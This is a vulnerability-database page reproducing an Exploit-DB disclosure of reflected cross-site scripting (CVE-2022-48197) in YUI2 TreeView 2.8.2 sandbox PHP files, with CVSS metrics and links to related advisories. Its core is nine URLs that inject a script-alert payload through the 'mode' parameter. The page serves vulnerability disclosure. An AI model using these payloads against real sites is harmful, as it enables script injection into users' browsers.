Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSITE TeamEDB-ID:51198
HistoryApr 01, 2023 - 12:00 a.m.

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

2023-04-0100:00:00
SITE Team
www.exploit-db.com
77
yui2
treeview
cross site scripting
xss
vulnerabilities
exploit
cve-2022-48197
rian saaty
macos
windowsos
linuxos
security

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

78.4%

JSON
# Exploit Title: Yahoo User Interface library (YUI2) TreeView  v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197


The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

Twitter: @Ryan_412_

Related

zdt 1
osv 1
nuclei 1
ubuntucve 1
prion 1
packetstorm 1
cve 1
nvd 1
cvelist 1
vulnrichment 1
zdt
zdt
Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected XSS Vulnerabilities
2023-04-02 00:00:00
osv
osv
CVE-2022-48197
2023-01-02 16:15:10
nuclei
nuclei
Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
2023-10-04 01:49:16
ubuntucve
ubuntucve
CVE-2022-48197
2023-01-02 00:00:00
prion
prion
Cross site scripting
2023-01-02 16:15:00
packetstorm
packetstorm
Yahoo User Interface TreeView 2.8.2 Cross Site Scripting
2023-04-03 00:00:00
cve
cve
CVE-2022-48197
2023-01-02 16:15:10
nvd
nvd
CVE-2022-48197
2023-01-02 16:15:10
cvelist
cvelist
CVE-2022-48197
2023-01-02 00:00:00
vulnrichment
vulnrichment
CVE-2022-48197
2023-01-02 00:00:00

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

78.4%

JSON
Related for EDB-ID:51198
zdt1osv1nuclei1ubuntucve1prion1packetstorm1cve1nvd1cvelist1vulnrichment1